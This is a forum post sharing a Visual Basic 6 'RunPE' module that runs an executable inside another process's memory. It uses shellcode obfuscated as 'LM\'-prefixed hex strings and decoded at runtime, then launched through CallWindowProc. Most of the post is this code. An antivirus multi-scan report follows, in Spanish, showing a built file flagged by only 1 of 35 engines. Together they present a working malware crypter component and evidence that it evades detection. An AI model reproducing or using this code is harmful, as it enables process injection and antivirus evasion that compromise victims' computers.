io.kent Posted January 24, 2013 Report Posted January 24, 2013 Option Explicit'---------------------------------------------------------------------------------------' Module : mshRunPE_Strings' Author : iCodeInVB6' Now : 05/16/2012 11:40' Purpose : Run executable in memory' Only uses CallWindowProc & shellcode' Credits : hamavb <-- made the shellcode!' Tested : Win7 x64' Mod by : Himanen'---------------------------------------------------------------------------------------'USER32Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPrivate s_ASM(7) As StringPrivate b_ASM(1287) As BytePublic Sub RunPE(ByVal TargetHost As String, bBuffer() As Byte) Dim i As Long Dim j As Long Dim k As Long s_ASM(0) = "LM\60LM\E8LM\4ELM\00LM\00LM\00LM\6BLM\00LM\65LM\00LM\72LM\00LM\6ELM\00LM\65LM\00LM\6CLM\00LM\33LM\00LM\32LM\00LM\00LM\00LM\6ELM\00LM\74LM\00LM\64LM\00LM\6CLM\00LM\6CLM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\5BLM\8BLM\FCLM\6ALM\42LM\E8LM\BBLM\03LM\00LM\00LM\8BLM\54LM\24LM\28LM\89LM\11LM\8BLM\54LM\24LM\2CLM\6ALM\3ELM\E8LM\AALM\03LM\00LM\00LM\89LM\11LM\6ALM\4ALM\E8LM\A1LM\03LM\00LM\00LM\89LM\39LM\6ALM\1ELM\6ALM\3CLM\E8LM\9DLM\03LM\00LM\00LM\6ALM\22LM\68LM\F4LM\00LM\00LM\00LM\E8LM\91LM\03LM\00LM\00LM\6ALM\26LM\6ALM\24LM\E8LM\88LM\03LM\00LM\00LM\6ALM\2ALM\6ALM\40LM\E8LM\7FLM\03LM\00LM\00" s_ASM(1) = 
"LM\6ALM\2ELM\6ALM\0CLM\E8LM\76LM\03LM\00LM\00LM\6ALM\32LM\68LM\C8LM\00LM\00LM\00LM\E8LM\6ALM\03LM\00LM\00LM\6ALM\2ALM\E8LM\5CLM\03LM\00LM\00LM\8BLM\09LM\C7LM\01LM\44LM\00LM\00LM\00LM\6ALM\12LM\E8LM\4DLM\03LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\79LM\03LM\00LM\00LM\6ALM\3ELM\E8LM\3BLM\03LM\00LM\00LM\8BLM\D1LM\6ALM\1ELM\E8LM\32LM\03LM\00LM\00LM\6ALM\40LM\FFLM\32LM\FFLM\31LM\FFLM\D0LM\6ALM\12LM\E8LM\23LM\03LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\4FLM\03LM\00LM\00LM\6ALM\1ELM\E8LM\11LM\03LM\00LM\00LM\8BLM\09LM\8BLM\51LM\3CLM\6ALM\3ELM\E8LM\05LM\03LM\00LM\00LM\8BLM\39LM\03LM\FALM\6ALM\22LM\E8LM\FALM\02LM\00LM\00LM\8BLM\09LM\68LM\F8LM\00LM\00LM\00LM\57LM\51LM\FFLM\D0LM\6ALM\00LM\E8LM\E8LM\02LM\00LM\00LM\68LM\88LM\FELM\B3LM\16LM\51LM\E8LM\14LM\03LM\00LM\00LM\6ALM\2ELM\E8LM\D6LM\02LM\00" s_ASM(2) = "LM\00LM\8BLM\39LM\6ALM\2ALM\E8LM\CDLM\02LM\00LM\00LM\8BLM\11LM\6ALM\42LM\E8LM\C4LM\02LM\00LM\00LM\57LM\52LM\6ALM\00LM\6ALM\00LM\6ALM\04LM\6ALM\00LM\6ALM\00LM\6ALM\00LM\6ALM\00LM\FFLM\31LM\FFLM\D0LM\6ALM\12LM\E8LM\A9LM\02LM\00LM\00LM\68LM\D0LM\37LM\10LM\F2LM\51LM\E8LM\D5LM\02LM\00LM\00LM\6ALM\22LM\E8LM\97LM\02LM\00LM\00LM\8BLM\11LM\6ALM\2ELM\E8LM\8ELM\02LM\00LM\00LM\8BLM\09LM\FFLM\72LM\34LM\FFLM\31LM\FFLM\D0LM\6ALM\00LM\E8LM\7ELM\02LM\00LM\00LM\68LM\9CLM\95LM\1ALM\6ELM\51LM\E8LM\AALM\02LM\00LM\00LM\6ALM\22LM\E8LM\6CLM\02LM\00LM\00LM\8BLM\11LM\8BLM\39LM\6ALM\2ELM\E8LM\61LM\02LM\00LM\00LM\8BLM\09LM\6ALM\40LM\68LM\00LM\30LM\00LM\00LM\FFLM\72LM\50LM\FFLM\77LM\34LM\FFLM\31LM\FFLM\D0LM\6ALM\36LM\E8LM\47LM\02LM\00LM\00LM\8BLM\D1LM\6ALM\22LM\E8LM\3ELM\02LM\00LM\00LM\8BLM\39LM\6ALM\3ELM\E8LM\35LM\02LM\00" s_ASM(3) = 
"LM\00LM\8BLM\31LM\6ALM\22LM\E8LM\2CLM\02LM\00LM\00LM\8BLM\01LM\6ALM\2ELM\E8LM\23LM\02LM\00LM\00LM\8BLM\09LM\52LM\FFLM\77LM\54LM\56LM\FFLM\70LM\34LM\FFLM\31LM\6ALM\00LM\E8LM\10LM\02LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\3CLM\02LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\12LM\E8LM\F9LM\01LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\25LM\02LM\00LM\00LM\6ALM\22LM\E8LM\E7LM\01LM\00LM\00LM\8BLM\11LM\83LM\C2LM\06LM\6ALM\3ALM\E8LM\DBLM\01LM\00LM\00LM\6ALM\02LM\52LM\51LM\FFLM\D0LM\6ALM\36LM\E8LM\CELM\01LM\00LM\00LM\C7LM\01LM\00LM\00LM\00LM\00LM\B8LM\28LM\00LM\00LM\00LM\6ALM\36LM\E8LM\BCLM\01LM\00LM\00LM\F7LM\21LM\6ALM\1ELM\E8LM\B3LM\01LM\00LM\00LM\8BLM\11LM\8BLM\52LM\3CLM\81LM\C2LM\F8LM\00LM\00LM\00LM\03LM\D0LM\6ALM\3ELM\E8LM\9FLM\01LM\00LM\00LM\03LM\11LM\6ALM\26LM\E8LM\96LM\01LM\00LM\00LM\6A" s_ASM(4) = "LM\28LM\52LM\FFLM\31LM\6ALM\12LM\E8LM\8ALM\01LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\B6LM\01LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\26LM\E8LM\73LM\01LM\00LM\00LM\8BLM\39LM\8BLM\09LM\8BLM\71LM\14LM\6ALM\3ELM\E8LM\65LM\01LM\00LM\00LM\03LM\31LM\6ALM\26LM\E8LM\5CLM\01LM\00LM\00LM\8BLM\09LM\8BLM\51LM\0CLM\6ALM\22LM\E8LM\50LM\01LM\00LM\00LM\8BLM\09LM\03LM\51LM\34LM\6ALM\46LM\E8LM\44LM\01LM\00LM\00LM\8BLM\C1LM\6ALM\2ELM\E8LM\3BLM\01LM\00LM\00LM\8BLM\09LM\50LM\FFLM\77LM\10LM\56LM\52LM\FFLM\31LM\6ALM\00LM\E8LM\2ALM\01LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\56LM\01LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\36LM\E8LM\13LM\01LM\00LM\00LM\8BLM\11LM\83LM\C2LM\01LM\89LM\11LM\6ALM\3ALM\E8LM\05LM\01LM\00LM\00LM\8BLM\09LM\3BLM\CALM\0FLM\85LM\33LM\FFLM\FFLM\FFLM\6ALM\32LM\E8LM\F4LM\00LM\00LM\00" s_ASM(5) = 
"LM\8BLM\09LM\C7LM\01LM\07LM\00LM\01LM\00LM\6ALM\00LM\E8LM\E5LM\00LM\00LM\00LM\68LM\D2LM\C7LM\A7LM\68LM\51LM\E8LM\11LM\01LM\00LM\00LM\6ALM\32LM\E8LM\D3LM\00LM\00LM\00LM\8BLM\11LM\6ALM\2ELM\E8LM\CALM\00LM\00LM\00LM\8BLM\09LM\52LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\22LM\E8LM\BBLM\00LM\00LM\00LM\8BLM\39LM\83LM\C7LM\34LM\6ALM\32LM\E8LM\AFLM\00LM\00LM\00LM\8BLM\31LM\8BLM\B6LM\A4LM\00LM\00LM\00LM\83LM\C6LM\08LM\6ALM\2ELM\E8LM\9DLM\00LM\00LM\00LM\8BLM\11LM\6ALM\46LM\E8LM\94LM\00LM\00LM\00LM\51LM\6ALM\04LM\57LM\56LM\FFLM\32LM\6ALM\00LM\E8LM\86LM\00LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\B2LM\00LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\22LM\E8LM\6FLM\00LM\00LM\00LM\8BLM\09LM\8BLM\51LM\28LM\03LM\51LM\34LM\6ALM\32LM\E8LM\60LM\00LM\00LM\00LM\8BLM\09LM\81LM\C1LM\B0LM\00LM\00LM\00LM\89LM\11LM\6ALM\00LM\E8" s_ASM(6) = "LM\4FLM\00LM\00LM\00LM\68LM\D3LM\C7LM\A7LM\E8LM\51LM\E8LM\7BLM\00LM\00LM\00LM\6ALM\32LM\E8LM\3DLM\00LM\00LM\00LM\8BLM\D1LM\6ALM\2ELM\E8LM\34LM\00LM\00LM\00LM\8BLM\09LM\FFLM\32LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\00LM\E8LM\24LM\00LM\00LM\00LM\68LM\88LM\3FLM\4ALM\9ELM\51LM\E8LM\50LM\00LM\00LM\00LM\6ALM\2ELM\E8LM\12LM\00LM\00LM\00LM\8BLM\09LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\4ALM\E8LM\04LM\00LM\00LM\00LM\8BLM\21LM\61LM\C3LM\8BLM\CBLM\03LM\4CLM\24LM\04LM\C3LM\6ALM\00LM\E8LM\F2LM\FFLM\FFLM\FFLM\68LM\54LM\CALM\AFLM\91LM\51LM\E8LM\1ELM\00LM\00LM\00LM\6ALM\40LM\68LM\00LM\10LM\00LM\00LM\FFLM\74LM\24LM\18LM\6ALM\00LM\FFLM\D0LM\FFLM\74LM\24LM\14LM\E8LM\CFLM\FFLM\FFLM\FFLM\89LM\01LM\83LM\C4LM\10LM\C3LM\E8LM\22LM\00LM\00LM\00LM\68LM\A4LM\4ELM\0ELM\ECLM\50LM\E8LM\4BLM\00LM\00LM\00LM\83LM\C4LM\08LM\FFLM\74LM\24LM\04" s_ASM(7) = 
"LM\FFLM\D0LM\FFLM\74LM\24LM\08LM\50LM\E8LM\38LM\00LM\00LM\00LM\83LM\C4LM\08LM\C3LM\55LM\52LM\51LM\53LM\56LM\57LM\33LM\C0LM\64LM\8BLM\70LM\30LM\8BLM\76LM\0CLM\8BLM\76LM\1CLM\8BLM\6ELM\08LM\8BLM\7ELM\20LM\8BLM\36LM\38LM\47LM\18LM\75LM\F3LM\80LM\3FLM\6BLM\74LM\07LM\80LM\3FLM\4BLM\74LM\02LM\EBLM\E7LM\8BLM\C5LM\5FLM\5ELM\5BLM\59LM\5ALM\5DLM\C3LM\55LM\52LM\51LM\53LM\56LM\57LM\8BLM\6CLM\24LM\1CLM\85LM\EDLM\74LM\43LM\8BLM\45LM\3CLM\8BLM\54LM\28LM\78LM\03LM\D5LM\8BLM\4ALM\18LM\8BLM\5ALM\20LM\03LM\DDLM\E3LM\30LM\49LM\8BLM\34LM\8BLM\03LM\F5LM\33LM\FFLM\33LM\C0LM\FCLM\ACLM\84LM\C0LM\74LM\07LM\C1LM\CFLM\0DLM\03LM\F8LM\EBLM\F4LM\3BLM\7CLM\24LM\20LM\75LM\E1LM\8BLM\5ALM\24LM\03LM\DDLM\66LM\8BLM\0CLM\4BLM\8BLM\5ALM\1CLM\03LM\DDLM\8BLM\04LM\8BLM\03LM\C5LM\5FLM\5ELM\5BLM\59LM\5ALM\5DLM\C3LM\C3LM\00LM\00LM\00LM\00" For i = 0 To 7 For j = 1 To 805 Step 5 b_ASM(k) = Replace(Mid(s_ASM(i), j, 5), "LM\", Chr(Val("38")) & Chr(Val("72"))): k = k + 1 Next j Next i CallWindowProcW VarPtr(b_ASM(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0End SubTipo de reporte: Analizar FicheroFecha/Hora: 24/01/2013 12:17:19 UTCFichero: sin.exeTamaño: 32768 KBMD5: 0952D1363A1E03F81166170962894CF6Detecciones:[COLOR="#FF0000"]1/35Estado: INFECTADO[/COLOR]AVG Free: LimpioArcaVir: LimpioAvast 5: Limpio[COLOR="#FF0000"]AntiVir (Avira): TR/Dropper.Gen[/COLOR]BitDefender: LimpioVirusBuster Internet Security: LimpioClam Antivirus: LimpioCOMODO Internet Security: LimpioDr.Web: LimpioeTrust-Vet: LimpioF-PROT Antivirus: LimpioF-Secure Internet Security: LimpioG Data: LimpioIKARUS Security: LimpioKaspersky Antivirus: LimpioMcAfee: LimpioMS Security Essentials: LimpioESET NOD32: LimpioNorman: LimpioNorton Antivirus: LimpioPanda Security: LimpioA-Squared: LimpioQuick Heal Antivirus: LimpioSolo Antivirus: LimpioSophos: LimpioTrend Micro Internet Security: LimpioVBA32 Antivirus: LimpioVexira Antivirus: LimpioZoner AntiVirus: LimpioAd-Aware: LimpioBullGuard: LimpioImmunet Antivirus: LimpioK7 Ultimate: LimpioNANO 
Antivirus: Limpio
VIPRE: Limpio